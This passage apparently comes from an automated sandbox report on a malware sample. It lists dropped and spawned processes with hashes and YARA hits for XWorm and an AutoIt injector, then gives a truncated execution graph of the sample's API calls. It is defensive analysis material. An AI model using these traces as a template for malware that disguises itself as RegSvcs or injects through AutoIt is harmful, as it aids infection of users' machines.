                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:24
                                                                                            Start time:11:36:01
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Roaming\RegSvcs.exe
                                                                                            Imagebase:0x730000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:25
                                                                                            Start time:11:36:01
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:26
                                                                                            Start time:11:36:12
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\wrse\sdadbtvsh.bin.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
                                                                                            Imagebase:0xa60000
                                                                                            File size:947'288 bytes
                                                                                            MD5 hash:EEAA0F5D82E56659C80FA84D588BF870
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:29
                                                                                            Start time:11:36:16
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0xf00000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:30
                                                                                            Start time:11:36:26
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\RegSvcs.exe"
                                                                                            Imagebase:0x1b0000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:31
                                                                                            Start time:11:36:26
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:32
                                                                                            Start time:11:36:33
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                            Imagebase:0x7ff678760000
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:34
                                                                                            Start time:11:36:33
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1896,i,7789945920983853701,11701749339926702711,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                            Imagebase:0x7ff67e6d0000
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:35
                                                                                            Start time:11:36:35
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\wrse\sdadbtvsh.bin.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\wrse\SDADBT~1.EXE" C:\Users\user\wrse\nngqrvwq.xl
                                                                                            Imagebase:0xa60000
                                                                                            File size:947'288 bytes
                                                                                            MD5 hash:EEAA0F5D82E56659C80FA84D588BF870
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AutoitInjector, Description: Yara detected Autoit Injector, Source: 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:36
                                                                                            Start time:11:36:42
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0x9d0000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:38
                                                                                            Start time:11:37:00
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\user\AppData\Roaming\RegSvcs.exe
                                                                                            Imagebase:0xd40000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:39
                                                                                            Start time:11:37:00
                                                                                            Start date:29/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff6ee680000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:9.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:9.8%
                                                                                              Total number of Nodes:1569
                                                                                              Total number of Limit Nodes:44
                                                                                              execution_graph 25548 bcb1b8 27 API calls 3 library calls 25549 bb1bbd GetCPInfo IsDBCSLeadByte 23493 bbf3b2 23494 bbf3be ___scrt_is_nonwritable_in_current_image 23493->23494 23525 bbeed7 23494->23525 23496 bbf3c5 23497 bbf518 23496->23497 23500 bbf3ef 23496->23500 23598 bbf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23497->23598 23499 bbf51f 23591 bc7f58 23499->23591 23503 bbf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23500->23503 23536 bc8aed 23500->23536 23510 bbf48f 23503->23510 23594 bc7af4 38 API calls 2 library calls 23503->23594 23508 bbf40e 23544 bbf953 GetStartupInfoW _abort 23510->23544 23512 bbf495 23545 bc8a3e 51 API calls 23512->23545 23514 bbf49d 23546 bbdf1e 23514->23546 23519 bbf4b1 23519->23499 23520 bbf4b5 23519->23520 23521 bbf4be 23520->23521 23596 bc7efb 28 API calls _abort 23520->23596 23597 bbf048 12 API calls ___scrt_uninitialize_crt 23521->23597 23524 bbf4c6 23524->23508 23526 bbeee0 23525->23526 23600 bbf654 IsProcessorFeaturePresent 23526->23600 23528 bbeeec 23601 bc2a5e 23528->23601 23530 bbeef1 23535 bbeef5 23530->23535 23609 bc8977 23530->23609 23533 bbef0c 23533->23496 23535->23496 23539 bc8b04 23536->23539 23537 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23538 bbf408 23537->23538 23538->23508 23540 bc8a91 23538->23540 23539->23537 23541 bc8ac0 23540->23541 23542 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23541->23542 23543 bc8ae9 23542->23543 23543->23503 23544->23512 23545->23514 23747 bb0863 23546->23747 23550 bbdf3d 23796 bbac16 23550->23796 23552 bbdf46 _abort 23553 bbdf59 GetCommandLineW 23552->23553 23554 bbdf68 23553->23554 23555 bbdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23553->23555 23800 bbc5c4 23554->23800 23811 ba4092 23555->23811 23561 bbdfe0 23805 bbdbde 23561->23805 23562 bbdf76 OpenFileMappingW 23564 bbdf8f MapViewOfFile 23562->23564 23565 bbdfd6 CloseHandle 23562->23565 23568 bbdfcd UnmapViewOfFile 23564->23568 23569 bbdfa0 __InternalCxxFrameHandler 23564->23569 23565->23555 23568->23565 23573 bbdbde 2 API calls 23569->23573 23575 bbdfbc 23573->23575 23574 bb90b7 8 API calls 23576 bbe0aa DialogBoxParamW 23574->23576 23575->23568 23577 bbe0e4 23576->23577 23578 bbe0fd 23577->23578 23579 bbe0f6 Sleep 23577->23579 23582 bbe10b 23578->23582 23841 bbae2f 23578->23841 23579->23578 23581 bbe12a DeleteObject 23583 bbe13f DeleteObject 23581->23583 23586 bbe146 23581->23586 23582->23581 23583->23586 23584 bbe177 23852 bbdc3b WaitForSingleObject 23584->23852 23585 bbe189 23849 bbac7c 23585->23849 23586->23584 23586->23585 23590 bbe1c3 23595 bbf993 GetModuleHandleW 23590->23595 24144 bc7cd5 23591->24144 23594->23510 23595->23519 23596->23521 23597->23524 23598->23499 23600->23528 23613 bc3b07 23601->23613 23604 bc2a67 23604->23530 23606 bc2a6f 23607 bc2a7a 23606->23607 23627 bc3b43 DeleteCriticalSection 23606->23627 23607->23530 23656 bcc05a 23609->23656 23612 bc2a7d 7 API calls 2 library calls 23612->23535 23615 bc3b10 23613->23615 23616 bc3b39 23615->23616 23618 bc2a63 23615->23618 23628 bc3d46 23615->23628 23633 bc3b43 DeleteCriticalSection 23616->23633 23618->23604 23619 bc2b8c 23618->23619 23649 bc3c57 23619->23649 23622 bc2ba1 23622->23606 23624 bc2baf 23625 bc2bbc 23624->23625 23655 bc2bbf 6 API calls ___vcrt_FlsFree 23624->23655 23625->23606 23627->23604 23634 bc3c0d 23628->23634 23631 bc3d7e InitializeCriticalSectionAndSpinCount 23632 bc3d69 23631->23632 23632->23615 23633->23618 23635 bc3c26 23634->23635 23636 bc3c4f 23634->23636 23635->23636 23641 bc3b72 23635->23641 23636->23631 23636->23632 23639 bc3c3b GetProcAddress 23639->23636 23640 bc3c49 23639->23640 23640->23636 23646 bc3b7e ___vcrt_InitializeCriticalSectionEx 23641->23646 23642 bc3bf3 23642->23636 23642->23639 23643 bc3b95 LoadLibraryExW 23644 bc3bfa 23643->23644 23645 bc3bb3 GetLastError 23643->23645 23644->23642 23647 bc3c02 FreeLibrary 23644->23647 23645->23646 23646->23642 23646->23643 23648 bc3bd5 LoadLibraryExW 23646->23648 23647->23642 23648->23644 23648->23646 23650 bc3c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 23649->23650 23651 bc3c71 23650->23651 23652 bc3c8a TlsAlloc 23651->23652 23653 bc2b96 23651->23653 23653->23622 23654 bc3d08 6 API calls ___vcrt_InitializeCriticalSectionEx 23653->23654 23654->23624 23655->23622 23659 bcc077 23656->23659 23660 bcc073 23656->23660 23658 bbeefe 23658->23533 23658->23612 23659->23660 23662 bca6a0 23659->23662 23674 bbfbbc 23660->23674 23663 bca6ac ___scrt_is_nonwritable_in_current_image 23662->23663 23681 bcac31 EnterCriticalSection 23663->23681 23665 bca6b3 23682 bcc528 23665->23682 23667 bca6d1 23697 bca6ed LeaveCriticalSection _abort 23667->23697 23668 bca6c2 23668->23667 23695 bca529 29 API calls 23668->23695 23671 bca6cc 23696 bca5df GetStdHandle GetFileType 23671->23696 23672 bca6e2 _abort 23672->23659 23675 bbfbc5 IsProcessorFeaturePresent 23674->23675 23676 bbfbc4 23674->23676 23678 bbfc07 23675->23678 23676->23658 23746 bbfbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23678->23746 23680 bbfcea 23680->23658 23681->23665 23683 bcc534 ___scrt_is_nonwritable_in_current_image 23682->23683 23684 bcc558 23683->23684 23685 bcc541 23683->23685 23698 bcac31 EnterCriticalSection 23684->23698 23706 bc91a8 20 API calls __dosmaperr 23685->23706 23688 bcc546 23707 bc9087 26 API calls ___std_exception_copy 23688->23707 23691 bcc550 _abort 23691->23668 23693 bcc564 23694 bcc590 23693->23694 23699 bcc479 23693->23699 23708 bcc5b7 LeaveCriticalSection _abort 23694->23708 23695->23671 23696->23667 23697->23672 23698->23693 23709 bcb136 23699->23709 23701 bcc498 23723 bc8dcc 23701->23723 23703 bcc48b 23703->23701 23716 bcaf0a 23703->23716 23704 bcc4ea 23704->23693 23706->23688 23707->23691 23708->23691 23715 bcb143 _unexpected 23709->23715 23710 bcb183 23730 bc91a8 20 API calls __dosmaperr 23710->23730 23711 bcb16e RtlAllocateHeap 23713 bcb181 23711->23713 23711->23715 23713->23703 23715->23710 23715->23711 23729 bc7a5e 7 API calls 2 library calls 23715->23729 23731 bcac98 23716->23731 23719 bcaf4f InitializeCriticalSectionAndSpinCount 23722 bcaf3a 23719->23722 23720 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23721 bcaf66 23720->23721 23721->23703 23722->23720 23724 bc8dd7 RtlFreeHeap 23723->23724 23728 bc8e00 __dosmaperr 23723->23728 23725 bc8dec 23724->23725 23724->23728 23745 bc91a8 20 API calls __dosmaperr 23725->23745 23727 bc8df2 GetLastError 23727->23728 23728->23704 23729->23715 23730->23713 23732 bcacc8 23731->23732 23736 bcacc4 23731->23736 23732->23719 23732->23722 23733 bcace8 23733->23732 23735 bcacf4 GetProcAddress 23733->23735 23737 bcad04 _unexpected 23735->23737 23736->23732 23736->23733 23738 bcad34 23736->23738 23737->23732 23739 bcad55 LoadLibraryExW 23738->23739 23743 bcad4a 23738->23743 23740 bcad8a 23739->23740 23741 bcad72 GetLastError 23739->23741 23740->23743 23744 bcada1 FreeLibrary 23740->23744 23741->23740 23742 bcad7d LoadLibraryExW 23741->23742 23742->23740 23743->23736 23744->23743 23745->23727 23746->23680 23858 bbec50 23747->23858 23750 bb0888 GetProcAddress 23753 bb08b9 GetProcAddress 23750->23753 23754 bb08a1 23750->23754 23751 bb08e7 23752 bb0c14 GetModuleFileNameW 23751->23752 23869 bc75fb 42 API calls 2 library calls 23751->23869 23763 bb0c32 23752->23763 23756 bb08cb 23753->23756 23754->23753 23756->23751 23757 bb0b54 23757->23752 23758 bb0b5f GetModuleFileNameW CreateFileW 23757->23758 23759 bb0c08 CloseHandle 23758->23759 23760 bb0b8f SetFilePointer 23758->23760 23759->23752 23760->23759 23761 bb0b9d ReadFile 23760->23761 23761->23759 23765 bb0bbb 23761->23765 23766 bb0c94 GetFileAttributesW 23763->23766 23768 bb0c5d CompareStringW 23763->23768 23769 bb0cac 23763->23769 23860 bab146 23763->23860 23863 bb081b 23763->23863 23765->23759 23767 bb081b 2 API calls 23765->23767 23766->23763 23766->23769 23767->23765 23768->23763 23770 bb0cb7 23769->23770 23773 bb0cec 23769->23773 23772 bb0cd0 GetFileAttributesW 23770->23772 23774 bb0ce8 23770->23774 23771 bb0dfb 23795 bba64d GetCurrentDirectoryW 23771->23795 23772->23770 23772->23774 23773->23771 23775 bab146 GetVersionExW 23773->23775 23774->23773 23776 bb0d06 23775->23776 23777 bb0d0d 23776->23777 23778 bb0d73 23776->23778 23779 bb081b 2 API calls 23777->23779 23780 ba4092 _swprintf 51 API calls 23778->23780 23781 bb0d17 23779->23781 23782 bb0d9b AllocConsole 23780->23782 23783 bb081b 2 API calls 23781->23783 23784 bb0da8 GetCurrentProcessId AttachConsole 23782->23784 23785 bb0df3 ExitProcess 23782->23785 23787 bb0d21 23783->23787 23874 bc3e13 23784->23874 23870 bae617 23787->23870 23788 bb0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 23788->23785 23791 ba4092 _swprintf 51 API calls 23792 bb0d4f 23791->23792 23793 bae617 53 API calls 23792->23793 23794 bb0d5e 23793->23794 23794->23785 23795->23550 23797 bb081b 2 API calls 23796->23797 23798 bbac2a OleInitialize 23797->23798 23799 bbac4d GdiplusStartup SHGetMalloc 23798->23799 23799->23552 23803 bbc5ce 23800->23803 23801 bbc6e4 23801->23561 23801->23562 23802 bb1fac CharUpperW 23802->23803 23803->23801 23803->23802 23899 baf3fa 82 API calls 2 library calls 23803->23899 23806 bbec50 23805->23806 23807 bbdbeb SetEnvironmentVariableW 23806->23807 23809 bbdc0e 23807->23809 23808 bbdc36 23808->23555 23809->23808 23810 bbdc2a SetEnvironmentVariableW 23809->23810 23810->23808 23900 ba4065 23811->23900 23814 bbb6dd LoadBitmapW 23815 bbb70b GetObjectW 23814->23815 23816 bbb6fe 23814->23816 23820 bbb71a 23815->23820 23968 bba6c2 FindResourceW 23816->23968 23963 bba5c6 23820->23963 23822 bbb770 23833 bada42 23822->23833 23823 bbb74c 23982 bba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23823->23982 23825 bba6c2 12 API calls 23827 bbb73d 23825->23827 23826 bbb754 23983 bba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23826->23983 23827->23823 23828 bbb743 DeleteObject 23827->23828 23828->23823 23830 bbb75d 23984 bba80c 8 API calls 23830->23984 23832 bbb764 DeleteObject 23832->23822 23995 bada67 23833->23995 23838 bb90b7 24128 bbeb38 23838->24128 23843 bbae3c 23841->23843 23842 bbaeca 23842->23582 23843->23842 24140 bb1fdd 23843->24140 23845 bbae64 23845->23842 24143 bbac04 SetCurrentDirectoryW 23845->24143 23847 bbae72 _abort _wcslen 23848 bbaea6 SHFileOperationW 23847->23848 23848->23842 23850 bbacab GdiplusShutdown OleUninitialize 23849->23850 23850->23590 23853 bbdc9b CloseHandle 23852->23853 23854 bbdc56 23852->23854 23853->23585 23855 bbdc59 PeekMessageW 23854->23855 23856 bbdc6b GetMessageW TranslateMessage DispatchMessageW 23855->23856 23857 bbdc8c WaitForSingleObject 23855->23857 23856->23857 23857->23853 23857->23855 23859 bb086d GetModuleHandleW 23858->23859 23859->23750 23859->23751 23861 bab15a GetVersionExW 23860->23861 23862 bab196 23860->23862 23861->23862 23862->23763 23864 bbec50 23863->23864 23865 bb0828 GetSystemDirectoryW 23864->23865 23866 bb085e 23865->23866 23867 bb0840 23865->23867 23866->23763 23868 bb0851 LoadLibraryW 23867->23868 23868->23866 23869->23757 23871 bae627 23870->23871 23876 bae648 23871->23876 23875 bc3e1b 23874->23875 23875->23788 23875->23875 23882 bad9b0 23876->23882 23879 bae66b LoadStringW 23880 bae645 23879->23880 23881 bae682 LoadStringW 23879->23881 23880->23791 23881->23880 23887 bad8ec 23882->23887 23884 bad9cd 23886 bad9e2 23884->23886 23895 bad9f0 26 API calls 23884->23895 23886->23879 23886->23880 23888 bad904 23887->23888 23894 bad984 _strncpy 23887->23894 23890 bad928 23888->23890 23896 bb1da7 WideCharToMultiByte 23888->23896 23893 bad959 23890->23893 23897 bae5b1 50 API calls __vsnprintf 23890->23897 23898 bc6159 26 API calls 3 library calls 23893->23898 23894->23884 23895->23886 23896->23890 23897->23893 23898->23894 23899->23803 23901 ba407c __vswprintf_c_l 23900->23901 23904 bc5fd4 23901->23904 23907 bc4097 23904->23907 23908 bc40bf 23907->23908 23909 bc40d7 23907->23909 23924 bc91a8 20 API calls __dosmaperr 23908->23924 23909->23908 23910 bc40df 23909->23910 23926 bc4636 23910->23926 23913 bc40c4 23925 bc9087 26 API calls ___std_exception_copy 23913->23925 23916 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23918 ba4086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 23916->23918 23918->23814 23919 bc4167 23935 bc49e6 51 API calls 4 library calls 23919->23935 23922 bc4172 23936 bc46b9 20 API calls _free 23922->23936 23923 bc40cf 23923->23916 23924->23913 23925->23923 23927 bc40ef 23926->23927 23928 bc4653 23926->23928 23934 bc4601 20 API calls 2 library calls 23927->23934 23928->23927 23937 bc97e5 GetLastError 23928->23937 23930 bc4674 23957 bc993a 38 API calls __fassign 23930->23957 23932 bc468d 23958 bc9967 38 API calls __fassign 23932->23958 23934->23919 23935->23922 23936->23923 23938 bc97fb 23937->23938 23939 bc9801 23937->23939 23959 bcae5b 11 API calls 2 library calls 23938->23959 23941 bcb136 _unexpected 20 API calls 23939->23941 23943 bc9850 SetLastError 23939->23943 23942 bc9813 23941->23942 23944 bc981b 23942->23944 23960 bcaeb1 11 API calls 2 library calls 23942->23960 23943->23930 23946 bc8dcc _free 20 API calls 23944->23946 23948 bc9821 23946->23948 23947 bc9830 23947->23944 23949 bc9837 23947->23949 23951 bc985c SetLastError 23948->23951 23961 bc9649 20 API calls _unexpected 23949->23961 23962 bc8d24 38 API calls _abort 23951->23962 23952 bc9842 23954 bc8dcc _free 20 API calls 23952->23954 23956 bc9849 23954->23956 23956->23943 23956->23951 23957->23932 23958->23927 23959->23939 23960->23947 23961->23952 23985 bba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23963->23985 23965 bba5cd 23966 bba5d9 23965->23966 23986 bba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23965->23986 23966->23822 23966->23823 23966->23825 23969 bba7d3 23968->23969 23970 bba6e5 SizeofResource 23968->23970 23969->23815 23969->23820 23970->23969 23971 bba6fc LoadResource 23970->23971 23971->23969 23972 bba711 LockResource 23971->23972 23972->23969 23973 bba722 GlobalAlloc 23972->23973 23973->23969 23974 bba73d GlobalLock 23973->23974 23975 bba7cc GlobalFree 23974->23975 23976 bba74c __InternalCxxFrameHandler 23974->23976 23975->23969 23977 bba7c5 GlobalUnlock 23976->23977 23987 bba626 GdipAlloc 23976->23987 23977->23975 23980 bba79a GdipCreateHBITMAPFromBitmap 23981 bba7b0 23980->23981 23981->23977 23982->23826 23983->23830 23984->23832 23985->23965 23986->23966 23988 bba638 23987->23988 23989 bba645 23987->23989 23991 bba3b9 23988->23991 23989->23977 23989->23980 23989->23981 23992 bba3da GdipCreateBitmapFromStreamICM 23991->23992 23993 bba3e1 GdipCreateBitmapFromStream 23991->23993 23994 bba3e6 23992->23994 23993->23994 23994->23989 23996 bada75 __EH_prolog 23995->23996 23997 badaa4 GetModuleFileNameW 23996->23997 23998 badad5 23996->23998 23999 badabe 23997->23999 24041 ba98e0 23998->24041 23999->23998 24001 badb31 24052 bc6310 24001->24052 24004 bae261 78 API calls 24007 badb05 24004->24007 24006 badb44 24008 bc6310 26 API calls 24006->24008 24007->24001 24007->24004 24019 badd4a 24007->24019 24016 badb56 ___vcrt_InitializeCriticalSectionEx 24008->24016 24009 badc85 24009->24019 24088 ba9d70 81 API calls 24009->24088 24013 badc9f ___std_exception_copy 24014 ba9bd0 82 API calls 24013->24014 24013->24019 24017 badcc8 ___std_exception_copy 24014->24017 24016->24009 24016->24019 24066 ba9e80 24016->24066 24082 ba9bd0 24016->24082 24087 ba9d70 81 API calls 24016->24087 24017->24019 24036 badcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 24017->24036 24089 bb1b84 MultiByteToWideChar 24017->24089 24075 ba959a 24019->24075 24020 bae159 24024 bae1de 24020->24024 24095 bc8cce 26 API calls ___std_exception_copy 24020->24095 24023 bae16e 24096 bc7625 26 API calls ___std_exception_copy 24023->24096 24025 bae214 24024->24025 24029 bae261 78 API calls 24024->24029 24030 bc6310 26 API calls 24025->24030 24027 bae1c6 24097 bae27c 78 API calls 24027->24097 24029->24024 24031 bae22d 24030->24031 24032 bc6310 26 API calls 24031->24032 24032->24019 24035 bb1da7 WideCharToMultiByte 24035->24036 24036->24019 24036->24020 24036->24035 24090 bae5b1 50 API calls __vsnprintf 24036->24090 24091 bc6159 26 API calls 3 library calls 24036->24091 24092 bc8cce 26 API calls ___std_exception_copy 24036->24092 24093 bc7625 26 API calls ___std_exception_copy 24036->24093 24094 bae27c 78 API calls 24036->24094 24039 bae29e GetModuleHandleW FindResourceW 24040 bada55 24039->24040 24040->23838 24042 ba98ea 24041->24042 24043 ba994b CreateFileW 24042->24043 24044 ba996c GetLastError 24043->24044 24047 ba99bb 24043->24047 24098 babb03 24044->24098 24046 ba998c 24046->24047 24049 ba9990 CreateFileW GetLastError 24046->24049 24048 ba99ff 24047->24048 24050 ba99e5 SetFileTime 24047->24050 24048->24007 24049->24047 24051 ba99b5 24049->24051 24050->24048 24051->24047 24053 bc6349 24052->24053 24054 bc634d 24053->24054 24065 bc6375 24053->24065 24102 bc91a8 20 API calls __dosmaperr 24054->24102 24056 bc6352 24103 bc9087 26 API calls ___std_exception_copy 24056->24103 24057 bc6699 24059 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24057->24059 24061 bc66a6 24059->24061 24060 bc635d 24062 bbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24060->24062 24061->24006 24063 bc6369 24062->24063 24063->24006 24065->24057 24104 bc6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24065->24104 24067 ba9ea5 24066->24067 24069 ba9e92 24066->24069 24068 ba9eb0 24067->24068 24071 ba9eb8 SetFilePointer 24067->24071 24068->24016 24069->24068 24105 